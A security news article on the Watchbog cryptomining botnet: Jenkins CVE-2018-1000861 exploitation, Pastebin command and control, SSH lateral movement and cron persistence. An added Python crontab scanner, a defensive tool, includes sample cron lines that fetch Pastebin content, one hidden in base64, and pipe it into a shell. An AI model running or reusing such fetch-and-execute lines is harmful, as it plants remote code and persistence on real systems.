Security experts have uncovered an incident that involved the Watchbog cryptomining botnet. Attackers exploited CVE-2018-1000861 to establish a foothold on the victim’s network and install Watchbog malware on unpatched systems.
The Cisco Incident Response team (CSIRS) responded to the incident and found the Linux-based malware. Its operators use Watchbog primarily to mine Monero cryptocurrency.
The team soon found that the malware relied on Pastebin for command and control (C2) operations. In addition, the attackers used base64-encoded URLs and Pastebin for obfuscation.
“The attack was still relatively simple to uncover – this attacker did not practice particularly strong operational security,” the CSIRS noted in the blog post.
Spreading laterally
CSIRS also discovered the attackers used SSH to spread laterally. In addition, the adversaries leveraged a Python script to scan for open Jenkins and Redis ports on other systems hosted on the same subnet.
The attackers used the Python script to target CVE-2018-1000861, a vulnerability in the Stapler web framework for HTTP request handling. If exploited, it could lead to code execution through crafted URLs.
Establishing persistence
Watchbog also used cron jobs to establish persistence on the targeted systems. For example, the jobs leverage a ‘kerberods’ installation script that has the dropper call out to Pastebin once per hour to fetch new instructions.
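To give defenders something concrete for the cron-based persistence described above, here is an added example (not code from Cisco or the researchers cited on this page) that scans crontab entries for the pattern reported here: an hourly job that fetches from Pastebin, either in clear text or via a base64-encoded URL, and pipes the result into a shell. The crontab lines it ships with are constructed samples, not indicators from the incident.

```python
import base64
import re
import sys

# Constructed sample crontab (not from the incident): one benign hourly job,
# one that fetches a Pastebin URL in clear text, one that hides it in base64.
SAMPLE_CRONTAB = """\
0 * * * * /usr/local/bin/rotate-logs.sh
0 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE1 | sh
0 * * * * echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VYQU1QTEUy | base64 -d | xargs wget -qO- | sh
"""

PASTE_HOST = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.IGNORECASE)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_tokens(text):
    """Yield the decoded form of every base64-looking token in a line."""
    for tok in B64_TOKEN.findall(text):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8", "ignore")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or padding does not line up


def suspicious_cron_entries(crontab_text):
    """Return (line, reasons) for entries that fetch from Pastebin, in clear
    text or hidden in base64, with extra context on schedule and shell use."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if PASTE_HOST.search(line):
            reasons.append("fetches from pastebin.com")
        if any(PASTE_HOST.search(d) for d in decode_b64_tokens(line)):
            reasons.append("base64-encoded pastebin.com URL")
        if reasons:
            fields = line.split()
            # "M * * * *" schedules the job once per hour, as reported above.
            if len(fields) > 5 and fields[0].isdigit() and fields[1] == "*":
                reasons.append("runs hourly")
            if re.search(r"\|\s*(sh|bash)\b", line):
                reasons.append("pipes download into a shell")
            findings.append((line, reasons))
    return findings


if __name__ == "__main__":
    # Pass a crontab file path to scan it; without one, the sample is scanned.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRONTAB
    for entry, why in suspicious_cron_entries(text):
        print(f"SUSPICIOUS: {entry}\n  -> {', '.join(why)}")
```

Run it against `crontab -l` output or the files under `/etc/cron.d` and `/var/spool/cron` on a host you suspect; a hit is a lead to investigate, not proof of compromise on its own.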
Another researcher, Renato Marinho from Morphus Labs, also added more information on how the malware achieves persistence.
“If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc’s behavior.”
In conclusion, it is critical for organizations to patch web applications. Unpatched systems are easy targets for attackers since they can use those vulnerabilities to gain a foothold on your network. As a consequence, attackers can spread laterally and even use your compromised systems for future botnets.